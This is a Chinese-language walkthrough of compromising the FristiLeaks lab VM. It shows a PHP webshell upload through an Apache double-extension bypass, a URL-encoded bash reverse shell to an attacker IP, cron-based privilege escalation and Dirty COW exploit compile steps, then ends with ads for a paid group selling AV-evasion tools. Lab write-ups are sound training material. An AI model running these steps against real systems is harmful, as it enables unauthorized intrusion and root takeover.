1.将虚拟机导入到vm中,扫描获得此靶机的ip
靶机ip为192.168.55.139
2.进行端口扫描、目录枚举、指纹识别
端口扫描:
目录枚举:
指纹识别:
3.进入靶机网页查看信息
发现网站没有什么信息
目录枚举中有一个robots.txt可以尝试访问一下试试
访问这个文件,发现有三个目录
继续访问这三个目录,结果三个目录全部都是以下内容
将目录枚举的url都打开,发现就这一个有用
抽象靶机在主页的fristi里面藏了后台登录框
尝试在输入框中sql注入,没用,然后再尝试查看网站源代码看看信息了
检查源代码时发现这里有提示
推测账户为eezeepz
这个是图片的超链接
将以上内容在新的页面中打开发现将图片下载下来了
页面源代码后面还有一串代码具有base64特征
将地址栏后面的base64代码进行修改,发现将eezeepz用户的密码下载下来了
使用账号:eezeepz 密码:keKkeKKeKKeKkEkkEk 进行登陆,登陆成功
发现可以进行文件上传
我们可以先尝试尝试php一句话
使用以下php一句话
根据刚刚信息收集的内容,apache 是 2.2.15 版本,有文件解析漏洞。
漏洞原理
由于管理员的错误配置, AddHandler application/x-httpd-php .php,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。
由于上传的文件格式有限制,所以将文件命名为111.php.png
得知文件的访问路径
访问路径得知上传成功
接下来我们要考虑进行反弹shell,由于刚刚的一句话木马中使用的函数是POST,这里我选择使用POST传参进行反弹shell
反弹shell命令:1=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.55.129%2F4444%200%3E%261
4.提权
首先进行信息收集
sudo无法提权
查看SUID权限文件
此靶机中不管在哪个目录,cd ~后都回到了/var/www目录下
4.1第一种提权方法
此目录下有一个notes.txt文件,查看该文件信息
得知要去home目录下的eezeepz下清理但是不能删除重要的东西,这个目录下也有notes.txt文件
把一些admin权限的命令让我们使用,需要在tmp文件下创建一个runthis的文件,能被定时任务所捕获
让Jerry的高权限执行以下代码,赋予我们高权限,等待一分钟
echo "/home/admin/chmod 777 /home/admin" >/tmp/runthis
已经有权限进入home目录下了
查看以下两个密文和加密用的代码
首先来分析一下加密函数:
import base64,codecs,sys
def encodeString(str):
base64string= base64.b64encode(str)
return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
首先将str进行base64编码,然后base64string[::-1]将编码后的字符串进行反转,随后进行13个位置的偏移量进行替换
由此我们可以改写出解密函数:
import base64,codecs,sys
def decodeString(encrypted_str):
# 先对传入的加密字符串进行rot13解码
rot13_decoded = codecs.decode(encrypted_str, 'rot13')
# 将经过rot13解码后的内容反转回来(因为加密时进行了反转操作)
reversed_str = rot13_decoded[::-1]
# 最后进行Base64解码,得到原始字符串
return base64.b64decode(reversed_str)
encrypted_result = sys.argv[1]
# 获取命令行传入的加密字符串
print(decodeString(encrypted_result))
# 调用解密函数进行解密,并输出结果
成功解密
根据密码明文LetThereBeFristi!,感觉是fristigod或者fristi的密码
成功登陆fristigod用户
不知道为什么我这个靶机用不了这条命令,wp的都可以
也可以查看历史命令执行查看到
随后在/var/fristigod/.secret_admin_stuff/doCom命令后加入其它命令即可执行
提权成功!
4.2第二种方法:脏牛提权
使用命令:searchsploit Linux 2.6.32 | grep -i "Privilege Escalation"查找提权脚本(试了几个不好用)
我们直接使用经典的脏牛漏洞,该漏洞影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统。
我在kali中下载的脚本不能用,去GitHub上下载了一个脚本进行提权https://github.com/firefart/dirtycow/blob/master/dirty.c
编译命令:
gcc -pthread dirty.c -o dirty -lcrypt
首先进行下载,先开启kali的端口
下载脚本,编译并启动
随后输入一个新密码即可
执行脚本后是添加了一个firefart用户(脚本默认添加此用户) 密码是我们自己输入的123
切换用户直接提权成功!
kali魔改版,新增60款工具,需要的兄弟们自取
我用夸克网盘分享了「zss_kali_kde完整版.7z」,点击链接即可保存。打开「夸克APP」,无需下载在线播放视频,畅享原画5倍速,支持电视投屏。
链接:https://pan.quark.cn/s/1b0e2c5f865d
现邀请读者参加我们的帮会,99元即可享受到超多红队工具以及各种资料,包括但不限于“照妖镜”、免杀教程、免杀工具、以及安卓免杀工具(不定期上线)
通过以下二维码进帮会可以私聊笔者
有想报考oscp的读者可以咨询作者,我们泷羽sec目前正在做oscp培训,泷老师带着打100+台靶机,同时还有直播讲解知识点。
